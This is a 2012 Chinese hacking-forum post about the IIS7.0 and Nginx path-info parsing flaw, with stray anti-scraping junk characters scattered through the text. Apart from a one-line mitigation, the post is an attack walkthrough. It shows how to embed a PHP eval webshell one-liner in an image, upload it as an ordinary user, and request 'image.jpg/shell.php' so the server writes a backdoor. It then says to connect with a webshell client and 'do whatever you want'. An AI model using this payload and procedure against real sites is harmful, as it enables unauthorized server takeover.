找回密码
 立即注册
查看: 2429|回复: 0
打印 上一主题 下一主题

IIS7.0解析漏洞利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-27 19:40:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0 ; x6 V1 Q) _4 P# l6 ]/ a8 I
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。% q' [# T  _# [' o" M! O" d3 Q5 m
__________________________________ 6 c, _5 i. q/ `" _5 s$ `
5 J1 ~1 G) L6 i( r2 _& `
先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
0 j  F$ J7 B; T# h4 v0 g先合并一张PHP一句话图片马,合并方法:
  F) R. l* F8 Q0 S①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
9 @& P3 f7 H$ h" U, m②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>" ' U! B* F* Z/ ?/ s; v  D5 Q* q
图片随便找一张.
6 P0 V1 a2 A$ U8 Q( Y# n. e一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?>
. m9 |/ r. M: h! l7 q) d; u然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
8 Y" a6 G6 P9 g& X4 ~. g找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。 ) l/ Q: x" p) {, n( O' M( @
比如假设图片地址为 http://www.political-security.com/tupian/1.jpg
4 O* ~; o) E1 O. _" G% S2 V则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php
1 W# Z- U/ J: b9 y然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php
! N3 a$ q$ X4 g0 r/ _# rshell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
# r3 F8 ~# R! u! j2 n/ C上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
% {6 }, m/ r: j' v找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
$ H( ^$ M6 m' m; ]1 V: k- N在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
$ Q' X- d) p& M9 l4 F剩下的就随便你去搞吧。4 J, ~7 V* g' U& R/ I( H

) e1 O! a' g, ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表